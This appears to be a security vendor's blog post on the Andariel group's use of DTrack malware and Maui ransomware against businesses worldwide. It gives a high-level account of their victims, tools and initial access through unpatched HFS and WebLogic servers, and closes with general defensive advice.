Our experts investigated the activity of Andariel, believed to be a subgroup of the Lazarus APT group. Cybercriminals use DTrack malware and Maui ransomware to attack businesses worldwide. As it’s typical for Lazarus, the group attacks for financial gain — this time through ransom demands.
Targets of Andariel attacks
Our experts concluded that, instead of focusing on any particular industry, the Andariel group is ready to attack any company. In June, the US Cybersecurity and Infrastructure Security Agency (CISA) reported that Maui ransomware targets mainly companies and government organizations in the US healthcare sector. However, our team also detected at least one attack on a housing company in Japan, as well as several victims in India, Vietnam and Russia.
The Andariel group’s primary tool is the long-established malware, DTrack. It collects information about a victim and sends it to a remote host. Among other things, DTrack collects browser history and saves it to a separate file. The variant used in Andariel attacks is able not only to send the harvested information to the cybercriminals’ server via HTTP, but to store it on a remote host in the victim’s network.
When the attackers find noteworthy data, Maui ransomware comes into play. It’s generally detected on attacked hosts 10 hours after DTrack malware activation. Our colleagues from Staiwell have studied its samples and concluded that the ransomware is controlled manually by the operators — that is, they specify which data to encrypt.
Another tool the attackers appear to be using is 3Proxy. This legitimate, free, cross-platform proxy server is likely of interest to attackers due to its compact size (only a few hundred kilobytes). This type of tool can be used to maintain remote access to a compromised computer.
How Andariel spreads its malware
The cybercriminals exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a Powershell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.
For a more detailed technical description of the attack and the tools involved, along with indicators of compromise, see our Securelist post.
How to stay safe?
First of all, make sure that all corporate devices, including servers, are equipped with robust security solutions. In addition, it would be wise to devise an anti-ransomware strategy and measures in advance just in case you do get infected.